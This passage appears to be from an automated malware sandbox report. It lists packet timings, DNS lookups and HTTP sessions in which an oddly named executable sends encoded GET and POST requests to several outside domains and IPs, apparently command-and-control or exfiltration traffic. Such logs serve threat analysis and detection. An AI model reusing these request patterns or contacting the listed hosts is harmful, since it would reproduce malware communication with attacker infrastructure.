                                  Jul 13, 2024 00:08:16.298547029 CEST8049742208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:16.298667908 CEST4974280192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:17.331031084 CEST4974280192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:17.335799932 CEST8049742208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:18.349021912 CEST4974380192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:18.353821039 CEST8049743208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:18.353894949 CEST4974380192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:18.355432034 CEST4974380192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:18.360166073 CEST8049743208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:18.804871082 CEST8049743208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:18.804950953 CEST4974380192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:19.862484932 CEST4974380192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:19.869966030 CEST8049743208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.880863905 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:20.888102055 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.888235092 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:20.893178940 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:20.900135994 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900166988 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900218010 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900245905 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900274038 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900302887 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.900525093 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.902533054 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:20.902561903 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:21.345302105 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:21.345417023 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:22.409369946 CEST4974480192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:22.420100927 CEST8049744208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:23.427423954 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:23.626410007 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:23.626501083 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:23.628108978 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:23.635143995 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762509108 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762561083 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762598991 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762635946 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762665987 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.762684107 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762696028 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.762717962 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762757063 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762790918 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.762871981 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762901068 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.762916088 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.763070107 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.763113976 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.772265911 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772306919 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772342920 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772370100 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.772878885 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.772927999 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.773050070 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.815368891 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.850358963 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850470066 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850507975 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850523949 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.850661039 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850712061 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.850716114 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850754023 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.850811005 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.851521015 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.851577044 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.851610899 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.851634979 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.852193117 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.852266073 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.852304935 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.852314949 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.852349997 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.853084087 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.853163958 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.853199959 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.853210926 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.853977919 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854021072 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.854032040 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854067087 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854105949 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.854823112 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854918003 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854952097 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.854965925 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.855784893 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.855911970 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.855957985 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.911215067 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.912280083 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:25.912327051 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.914305925 CEST4974580192.168.2.4208.91.197.27
                                  Jul 13, 2024 00:08:25.921427965 CEST8049745208.91.197.27192.168.2.4
                                  Jul 13, 2024 00:08:39.487592936 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:39.495687008 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:39.495791912 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:39.497873068 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:39.505017996 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429691076 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429725885 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429739952 CEST804974643.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:40.429812908 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:40.429812908 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:41.003001928 CEST4974680192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.021399021 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.028299093 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.028400898 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.029982090 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:42.036551952 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.918051958 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.918104887 CEST804974743.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:42.918291092 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:43.534235954 CEST4974780192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.553004026 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.559801102 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.559904099 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.561718941 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:44.568802118 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568835020 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568864107 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568896055 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.568923950 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569706917 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569899082 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569928885 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:44.569979906 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:45.422015905 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:45.422080994 CEST804974843.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:45.422259092 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:46.065521955 CEST4974880192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.090790033 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.097687006 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.097788095 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.099536896 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.105922937 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.967788935 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.967919111 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:47.968311071 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.970058918 CEST4974980192.168.2.443.252.167.188
                                  Jul 13, 2024 00:08:47.976073980 CEST804974943.252.167.188192.168.2.4
                                  Jul 13, 2024 00:08:53.085059881 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.089955091 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.090027094 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.091829062 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.097464085 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728615999 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728641987 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728660107 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728758097 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728774071 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728775978 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.728854895 CEST8049750194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:53.728856087 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:53.728910923 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:54.596812010 CEST4975080192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.615408897 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.620424032 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:55.620512962 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.622361898 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:55.627154112 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262490034 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262523890 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262542009 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262557030 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262574911 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262589931 CEST8049751194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:56.262604952 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:56.262634993 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:56.262634993 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:57.128690004 CEST4975180192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.146394968 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.153675079 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.153980970 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.156059027 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.163325071 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163364887 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163398027 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163429022 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.163456917 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164839029 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164869070 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164902925 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.164932013 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809704065 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809750080 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809787035 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809823036 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809855938 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809880018 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.809891939 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809921980 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.809932947 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:58.809962034 CEST8049752194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:08:58.810005903 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:08:59.659288883 CEST4975280192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.677875042 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.684194088 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:00.684274912 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.686052084 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:00.693044901 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325706005 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325731993 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325745106 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325761080 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325776100 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325792074 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325804949 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325896978 CEST8049753194.9.94.85192.168.2.4
                                  Jul 13, 2024 00:09:01.325923920 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.325998068 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.325998068 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.330343962 CEST4975380192.168.2.4194.9.94.85
                                  Jul 13, 2024 00:09:01.337613106 CEST8049753194.9.94.85192.168.2.4

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 13, 2024 00:07:30.325550079 CEST6434753192.168.2.41.1.1.1
                                  Jul 13, 2024 00:07:30.354027987 CEST53643471.1.1.1192.168.2.4
                                  Jul 13, 2024 00:07:46.083853960 CEST5734553192.168.2.41.1.1.1
                                  Jul 13, 2024 00:07:46.109668016 CEST53573451.1.1.1192.168.2.4
                                  Jul 13, 2024 00:07:59.397193909 CEST5343453192.168.2.41.1.1.1
                                  Jul 13, 2024 00:07:59.407500029 CEST53534341.1.1.1192.168.2.4
                                  Jul 13, 2024 00:08:07.474450111 CEST5479553192.168.2.41.1.1.1
                                  Jul 13, 2024 00:08:07.488152027 CEST53547951.1.1.1192.168.2.4
                                  Jul 13, 2024 00:08:15.554599047 CEST6114253192.168.2.41.1.1.1
                                  Jul 13, 2024 00:08:15.812743902 CEST53611421.1.1.1192.168.2.4
                                  Jul 13, 2024 00:08:30.928488016 CEST6238853192.168.2.41.1.1.1
                                  Jul 13, 2024 00:08:30.941900015 CEST53623881.1.1.1192.168.2.4
                                  Jul 13, 2024 00:08:39.006345987 CEST5027053192.168.2.41.1.1.1
                                  Jul 13, 2024 00:08:39.485043049 CEST53502701.1.1.1192.168.2.4
                                  Jul 13, 2024 00:08:52.975266933 CEST6221253192.168.2.41.1.1.1
                                  Jul 13, 2024 00:08:53.082964897 CEST53622121.1.1.1192.168.2.4
                                  Jul 13, 2024 00:09:06.755645037 CEST4971553192.168.2.41.1.1.1
                                  Jul 13, 2024 00:09:06.930857897 CEST53497151.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 13, 2024 00:07:30.325550079 CEST192.168.2.41.1.1.10x94fbStandard query (0)www.hprlz.czA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:07:46.083853960 CEST192.168.2.41.1.1.10x91fStandard query (0)www.catherineviskadi.comA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:07:59.397193909 CEST192.168.2.41.1.1.10xfb6eStandard query (0)www.hatercoin.onlineA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:07.474450111 CEST192.168.2.41.1.1.10xbaf7Standard query (0)www.fourgrouw.cfdA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:15.554599047 CEST192.168.2.41.1.1.10xea58Standard query (0)www.bfiworkerscomp.comA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:30.928488016 CEST192.168.2.41.1.1.10x60f2Standard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:39.006345987 CEST192.168.2.41.1.1.10xab47Standard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:52.975266933 CEST192.168.2.41.1.1.10x9d3dStandard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:09:06.755645037 CEST192.168.2.41.1.1.10x513fStandard query (0)www.anuts.topA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 13, 2024 00:07:30.354027987 CEST1.1.1.1192.168.2.40x94fbNo error (0)www.hprlz.cz5.44.111.162A (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:07:46.109668016 CEST1.1.1.1192.168.2.40x91fNo error (0)www.catherineviskadi.com217.160.0.106A (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:07:59.407500029 CEST1.1.1.1192.168.2.40xfb6eName error (3)www.hatercoin.onlinenonenoneA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:07.488152027 CEST1.1.1.1192.168.2.40xbaf7Name error (3)www.fourgrouw.cfdnonenoneA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:15.812743902 CEST1.1.1.1192.168.2.40xea58No error (0)www.bfiworkerscomp.com208.91.197.27A (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:30.941900015 CEST1.1.1.1192.168.2.40x60f2Name error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:39.485043049 CEST1.1.1.1192.168.2.40xab47No error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:53.082964897 CEST1.1.1.1192.168.2.40x9d3dNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:08:53.082964897 CEST1.1.1.1192.168.2.40x9d3dNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                                  Jul 13, 2024 00:09:06.930857897 CEST1.1.1.1192.168.2.40x513fNo error (0)www.anuts.top23.251.54.212A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • www.hprlz.cz
                                  • www.catherineviskadi.com
                                  • www.bfiworkerscomp.com
                                  • www.xn--fhq1c541j0zr.com
                                  • www.xn--matfrmn-jxa4m.se

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.4497365.44.111.162804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:07:30.369421959 CEST505OUTGET /w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.hprlz.cz
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:07:31.044356108 CEST743INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:07:30 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Content-Length: 386
                                  Connection: close
                                  Location: https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 59 32 41 68 52 3d 66 44 4e 64 5a 50 48 48 31 68 73 70 38 72 72 70 26 61 6d 70 3b 74 44 41 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 7a [TRUNCATED]
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449737217.160.0.106804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:07:46.120126963 CEST791OUTPOST /qe66/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.catherineviskadi.com
                                  Origin: http://www.catherineviskadi.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.catherineviskadi.com/qe66/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d
